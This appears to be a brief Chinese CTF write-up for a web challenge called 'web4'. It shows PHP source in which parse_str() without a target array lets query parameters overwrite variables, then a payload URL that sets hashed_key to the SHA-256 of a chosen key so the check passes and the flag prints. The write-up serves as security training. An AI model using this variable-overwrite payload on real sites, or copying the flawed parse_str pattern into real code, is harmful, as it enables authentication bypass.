Web web4

Posted 2021-12-02 mutou123

题目

进去

 

 

<?php
error_reporting(0);
include("flag.php");
$hashed_key = ‘ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a‘;
$parsed = parse_url($_SERVER[‘REQUEST_URI‘]); //本函数解析一个 URL 并返回一个关联数组，包含在 URL 中出现的各种组成部分。
if(isset($parsed["query"])){ //query为 url ?后面的内容
    $query = $parsed["query"];
    $parsed_query = parse_str($query); //

定义和用法

 

parse_str() 函数把查询字符串解析到变量中。

 

注释：如果未设置 array 参数，则由该函数设置的变量将覆盖已存在的同名变量。

这题即利用 变量覆盖解题


    if($parsed_query!=NULL){
        $action = $parsed_query[‘action‘];
    }

    if($action==="auth"){
        $key = $_GET["key"];
        $hashed_input = hash(‘sha256‘, $key);
        if($hashed_input!==$hashed_key){
            die("<img src=‘cxk.jpg‘>");
        }

        echo $flag;
    }
}else{
    show_source(__FILE__);
}?>

 

 

payload可以为：

http://39.100.83.188:8066/?action=auth&key=521&hashed_key=72933e3b31f0070af6478edc3becf96e1ee59917620e8c509cf0e6b360e29c02

 

即出来

flag{[email protected]_15_4ere}

 

有些困了，写得有点草了，以后再具体补充吧！